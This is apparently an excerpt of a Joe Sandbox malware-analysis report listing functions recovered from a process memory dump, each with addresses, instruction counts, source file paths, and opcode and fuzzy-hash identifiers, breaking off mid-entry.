                                                                    • Opcode ID: 96bff20d2f6118111bfaf8c5510d00f8e103aedfc0a9784c1436ea5e11aed1ec
                                                                    • Instruction ID: 7637a1cd364a8e530595708e2f67c58807e04d097557dd42c842e664359ebdf7
                                                                    • Opcode Fuzzy Hash: 96bff20d2f6118111bfaf8c5510d00f8e103aedfc0a9784c1436ea5e11aed1ec
                                                                    • Instruction Fuzzy Hash: 3021BC75600648AFC719CB68C840F6AB7F8FF88740F1404A9F949DB6A0E634ED41CBA8
                                                                    Function 28FF2835 Relevance: .1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a46bd94fac59175c7ffa6987b624b25b7d68cf9057987c6c53e3c80a413b6aa1
                                                                    • Instruction ID: 26bbbab086086cd8302135a4701bc51f941433859e2c41e6ebf6724e74aefcb9
                                                                    • Opcode Fuzzy Hash: a46bd94fac59175c7ffa6987b624b25b7d68cf9057987c6c53e3c80a413b6aa1
                                                                    • Instruction Fuzzy Hash: D7213832746688ABE3264768CC04F1937D6AF41B70F2907B1FA619B6F2DB7CC802C244
                                                                    Function 28FD6C50 Relevance: .1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                    • Instruction ID: 20174c402009e62f9723059b2e6af7fc1020bc8a3a1ca9667efa1a54411b9823
                                                                    • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                    • Instruction Fuzzy Hash: 4A318776601604CFC754CF18C080B16BBE9FF48714F2888AEEA498B752DB35ED42CB90
                                                                    Function 29050946 Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c0cf4e3dc6d6656b1873ad43e47f153240abef9d45bf81c7f6e05510bfbd7fb
                                                                    • Instruction ID: 23f2a1453edeabe6f38ac731f22a9255a3607d05760659fe302cb794fe12de00
                                                                    • Opcode Fuzzy Hash: 7c0cf4e3dc6d6656b1873ad43e47f153240abef9d45bf81c7f6e05510bfbd7fb
                                                                    • Instruction Fuzzy Hash: E72119B1E0124DABCB14DFAAD880AAEFBF9BF98700F10052FE409E7254DA749941CB54
                                                                    Function 2900A30B Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df56eb937a794328041f393a965c72e7f683146f9ce224790a9c24445dd0de97
                                                                    • Instruction ID: a2dd38ea279fd249d74cb08a21127f378a02d9a11dab411a350b531a40b5a6cf
                                                                    • Opcode Fuzzy Hash: df56eb937a794328041f393a965c72e7f683146f9ce224790a9c24445dd0de97
                                                                    • Instruction Fuzzy Hash: 4321BE396017019FC728CF69CC05B4673F5AF18744F148868A509DB761E331E943CB94
                                                                    Function 29050E7F Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3280e29dd3374fb341c71754196f26d8bba01fcc78309c6a8fb2f12a960d7fd2
                                                                    • Instruction ID: 278cd83f7f4b630ec109be7fd480dbadc1d721526676dae1e73801fed2b6af1c
                                                                    • Opcode Fuzzy Hash: 3280e29dd3374fb341c71754196f26d8bba01fcc78309c6a8fb2f12a960d7fd2
                                                                    • Instruction Fuzzy Hash: A4218172501608EBC719CB55C894F9BB7F9FF88740F104969F50AD7650E634E901CB54
                                                                    Function 290680A8 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                    • Instruction ID: e630a4f344473285fb1eae67cbf25ea8436ff46e5fdbb794d65534af24d466dc
                                                                    • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                    • Instruction Fuzzy Hash: 14216D72900209EFDB128F98CC40B9EBBFEEF98350F204855F954A7261D734DA518F54
                                                                    Function 2900AAEE Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                    • Instruction ID: 541eecf44dad93576d9c20c147ce1efa794d6caffad6c745dcb9ac78724abf9c
                                                                    • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                    • Instruction Fuzzy Hash: 4C21BE72A00A08DFE7298F5AC558F1AB7E7EF94B50F10897EE54987612D730ED02CB80
                                                                    Function 29074F42 Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                    • Instruction ID: 43fd7d1be42e70306bcbd815b81fc337fa7e8462caa4024879425b0739559eb5
                                                                    • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                    • Instruction Fuzzy Hash: C0215075E00219AFC705CF98C8819EEBBB5EF58314B1144A9E409A7351DB319E42CBA0
                                                                    Function 29000124 Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                    • Instruction ID: 0e476041985df0de44de07c54b90d24a59c421c8f28608c9a918cb8746591176
                                                                    • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                    • Instruction Fuzzy Hash: 9711EF72A41608BFF7168F44CC51F9A7BBDEF91750F10482AFA048B190E671EE46CB60
                                                                    Function 28FD80E9 Relevance: .1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 339992002144b049295c556c2b46fb217097f64349ca41db976f39bfce86e555
                                                                    • Instruction ID: 08b032edd385c4a3c0f748bc3adc1f0c31d700470cdc9c79dbb1572cdcf9c1c7
                                                                    • Opcode Fuzzy Hash: 339992002144b049295c556c2b46fb217097f64349ca41db976f39bfce86e555
                                                                    • Instruction Fuzzy Hash: 80218176A11205EFCB04CF98C581A6EBBF6FB88718F24456DD204A7351DB71AE0ACBD0
                                                                    Function 28FFE8C0 Relevance: .1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dbccc2451f59e704acd82a29ce9dc6ca0ab4034b842f479feecfceb28461ce14
                                                                    • Instruction ID: 99ae20ccb3d4bd4c745c6ab9ad07d3ee46b3c57aea9e08401dcf4ffbf1fe4512
                                                                    • Opcode Fuzzy Hash: dbccc2451f59e704acd82a29ce9dc6ca0ab4034b842f479feecfceb28461ce14
                                                                    • Instruction Fuzzy Hash: 1911E577205118ABCB19CA74CD85A5F739BDFE5270B294D39E626CB390E930D812C294
                                                                    Function 29066870 Relevance: .1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 214e078ba3232795b1dc0d1f09fcd61219c690614c3d437eeb3ef63ce4ff8f7b
                                                                    • Instruction ID: 941ed4f97b0f121790786dc38224ed37f7e42d2b50a7caf3936303b1a4bf2e6b
                                                                    • Opcode Fuzzy Hash: 214e078ba3232795b1dc0d1f09fcd61219c690614c3d437eeb3ef63ce4ff8f7b
                                                                    • Instruction Fuzzy Hash: 9311C132241508EFC312CBA9C940F4A77ECEFAA7A4F114429F605DB260EB70D902CBE0
                                                                    Function 2909A8E4 Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                    • Instruction ID: a79e0ce41087e31dc5900a0d04e2bbe41edd99ca2eaf26601354774aa2676d21
                                                                    • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                    • Instruction Fuzzy Hash: 6A110132A10909AFDB19CB58C801F9EB7F6FF84710F058669EC95A7340E631BE02DB80
                                                                    Function 28FD0AD0 Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                    • Instruction ID: 858906be5bdd7b7f650e4ad72b88a8c86eb25c947f54521c7ee32111c4760528
                                                                    • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                    • Instruction Fuzzy Hash: FE21F4B5A01B059FD3A0CF29D441B52BBF5FB48B10F10492AE98ACBB50E371E814CF90
                                                                    Function 28FD2F12 Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0827c875e0ef23a54525bfd61c4fe7db94678bc07063b0d1b607e18f0349ef64
                                                                    • Instruction ID: 60d5a4449d1e6934cc156e539e07efffff0c3bbc9d39f559070cea1975ac4bdb
                                                                    • Opcode Fuzzy Hash: 0827c875e0ef23a54525bfd61c4fe7db94678bc07063b0d1b607e18f0349ef64
                                                                    • Instruction Fuzzy Hash: 301148333062056FD22467A9DCC0F1EB7DBAF64A60F580C66F705DB288E9B5E94182E1
                                                                    Function 290A4B00 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c9e990e53df8e138c014cceaf095d71a51985ce2e0e953459d369576344c419e
                                                                    • Instruction ID: 9ef7ec0e8806525b963eab6e4c1e4613d0a033a609d7496abfd5c453c507b96e
                                                                    • Opcode Fuzzy Hash: c9e990e53df8e138c014cceaf095d71a51985ce2e0e953459d369576344c419e
                                                                    • Instruction Fuzzy Hash: 5C11A03A2106189FC7159AA9D840F56B7E7AFC4751F15482AEF8A87690EA30A803CBD0
                                                                    Function 28FFEA2E Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6e7a9c8a233af3c55d3248c75785fc7b86cf2574a9ca88c9db70bd1d823a0f2
                                                                    • Instruction ID: 74598f2bf1223db675cca7e2b027e4643b85921e240d392c868df69a8809da37
                                                                    • Opcode Fuzzy Hash: f6e7a9c8a233af3c55d3248c75785fc7b86cf2574a9ca88c9db70bd1d823a0f2
                                                                    • Instruction Fuzzy Hash: 2D01D279106248EFC319DF15D444F1AB7FAEBA5715F24817AE1088B2A0E7749D41CB94
                                                                    Function 290A4940 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67a4bf0cd940572e1b0b214abdc0da18b657098da7c69bcbe0bdeb7951969c2f
                                                                    • Instruction ID: 4dc7d48a958867de19b8b9a2706fe51de0b9aebdafa8454235f7ecff17434983
                                                                    • Opcode Fuzzy Hash: 67a4bf0cd940572e1b0b214abdc0da18b657098da7c69bcbe0bdeb7951969c2f
                                                                    • Instruction Fuzzy Hash: F70104364422089BC326CF5AD800E06B7E8EB817B0B214666FE6C9B192E630D922C7C0
                                                                    Function 28FCA250 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                    • Instruction ID: 3f083d63a72d7521f2b74ca48a9e1142214e119fd0994d3a7a74138a55c12e1d
                                                                    • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                    • Instruction Fuzzy Hash: 5A0126B2406726EBC720CF15D840EA27BF6EF59764700892DFD958B281D331E620CB70
                                                                    Function 29006DA0 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                    • Instruction ID: 28031f40fdaa4ac375d0acc79694ad064f07040c301ce67b657144c0d57caab3
                                                                    • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                    • Instruction Fuzzy Hash: 7D0128716053A9A7FF199B91D820B9F7FA6DF90B90F004665AA055F280E7B4D882C3E1
                                                                    Function 28FC6DF6 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b16347440dd842f79e2b03a21e04073889ca406f7a33b8af8fbb7a708ce4ddf4
                                                                    • Instruction ID: b857128081f3def19e5ea0854a2be0909420a9bf354393179e392d1213e20b58
                                                                    • Opcode Fuzzy Hash: b16347440dd842f79e2b03a21e04073889ca406f7a33b8af8fbb7a708ce4ddf4
                                                                    • Instruction Fuzzy Hash: BB01F136E04A0AEBCF04AE65DD8495AB7E5FF95320B540938F9248B651EB21EC12CAD0
                                                                    Function 2904E1D0 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 521e6f2a89c8a05993090e81c70502df4392ff4111fd897cc963db857e34c998
                                                                    • Instruction ID: ed6b7c033a94c0204c6ce3e437c3e89c5e11b4914d922921fa51e742e6f13067
                                                                    • Opcode Fuzzy Hash: 521e6f2a89c8a05993090e81c70502df4392ff4111fd897cc963db857e34c998
                                                                    • Instruction Fuzzy Hash: EA11C036642644EFCB1ADF58DD80F06B7B9FF54B84F2404B5FA059B6A1D235ED02CA90
                                                                    Function 28FD6259 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef59b531538d8074130ca75be2a0a9427a445e6c5831bae8ad9102372e39e266
                                                                    • Instruction ID: 194911b07d87ba3dd95eeddce7adc423a336687822e4ac49757f66ddbea38fdf
                                                                    • Opcode Fuzzy Hash: ef59b531538d8074130ca75be2a0a9427a445e6c5831bae8ad9102372e39e266
                                                                    • Instruction Fuzzy Hash: 7911AC7154222CBBDF25DB68CC82FE9B3B5AF08710F5485D4A319A60E1DB309E82CF94
                                                                    Function 2905C810 Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: daa82d01e38495d5211378fb964e7718d43ff29e6904fa41ff8ce2b3c96cc37f
                                                                    • Instruction ID: 29811e084ec00eba278c1673d3ab5ecaea1ff8c58415b98e7d4f657bfa20ddb4
                                                                    • Opcode Fuzzy Hash: daa82d01e38495d5211378fb964e7718d43ff29e6904fa41ff8ce2b3c96cc37f
                                                                    • Instruction Fuzzy Hash: 5B1118B1A0021DABCB04DFA9D541AAEB7F8FF58340F10806AB905E7351D674EA01CBA4
                                                                    Function 2907EA60 Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e66e2eaeebc400dbb534aa0dabfcaf7b25ca377893d857123930fc94002d67e8
                                                                    • Instruction ID: 1ab7a40472fc93941f6ee6d05b993796880676906c2c9cdbc1ee6c88a15b7fc3
                                                                    • Opcode Fuzzy Hash: e66e2eaeebc400dbb534aa0dabfcaf7b25ca377893d857123930fc94002d67e8
                                                                    • Instruction Fuzzy Hash: D901F135142318ABC32A9E108444DAEBBFAFF516A0B044C3AF1064F621EB30FC42CB94
                                                                    Function 290A4D30 Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db51ec01d6091a7e65991a9e3c7ea3ea7411886ffa25612e36c4d444f432ea98
                                                                    • Instruction ID: caa11c7d2fa7b722fe276938d3ff4b38b379ede620cbcd4b35901edbefe9c778
                                                                    • Opcode Fuzzy Hash: db51ec01d6091a7e65991a9e3c7ea3ea7411886ffa25612e36c4d444f432ea98
                                                                    • Instruction Fuzzy Hash: 56019272A0014CABCB10DF99CD45EAFBBBDEF58650F040415F519E3111CA34D911CBA0
                                                                    Function 28FD208A Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                    • Instruction ID: 80a518442eb04920569a2852922d7291e8ee2eb48f6a2e290e439151d4462151
                                                                    • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                    • Instruction Fuzzy Hash: 680124336021009BDB098A29D884F8277A7BFC4700F1E45B6EF048F246EB71E882C7D0
                                                                    Function 29056050 Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 479887408ff4187433606c2b18bc4ab36374586781610eaa67c0f93034a225b5
                                                                    • Instruction ID: 4bc0bd95a9393febeec2d0b8e8564cfbada3cc0181d072dca0f8c6ecfd50f8d7
                                                                    • Opcode Fuzzy Hash: 479887408ff4187433606c2b18bc4ab36374586781610eaa67c0f93034a225b5
                                                                    • Instruction Fuzzy Hash: 3511137690011DABCB15DBD4CC80EEFBBBDFF48258F044566A906A7211EA34AA55CBE0
                                                                    Function 290669C0 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5ec89957b639e6103990dc155257acedf2329d2134e491291898a46bd00dc78
                                                                    • Instruction ID: 6e444ba1d71edfe443c13fd4788b879f4a6d9ed14819f0ba5695e56448711d1f
                                                                    • Opcode Fuzzy Hash: e5ec89957b639e6103990dc155257acedf2329d2134e491291898a46bd00dc78
                                                                    • Instruction Fuzzy Hash: 1901FC322152099BC314DFB9C84895BF7ECFF94760F114929F95887190E7309902CBD1
                                                                    Function 28FCC020 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                    • Instruction ID: 4561068517b22de3fdab7d47d4f132fb0af18277f6efbbcd7cc076ac30ba83ca
                                                                    • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                    • Instruction Fuzzy Hash: AF01D832501B49AFEB26D665C800E9777EAFFD5350F058C2AAA45CB550EAB4FA02C750
                                                                    Function 290120F0 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dbc821c01885a08ceec35826f650adcd9ae2c0d23ee8ab18606e2505dae314aa
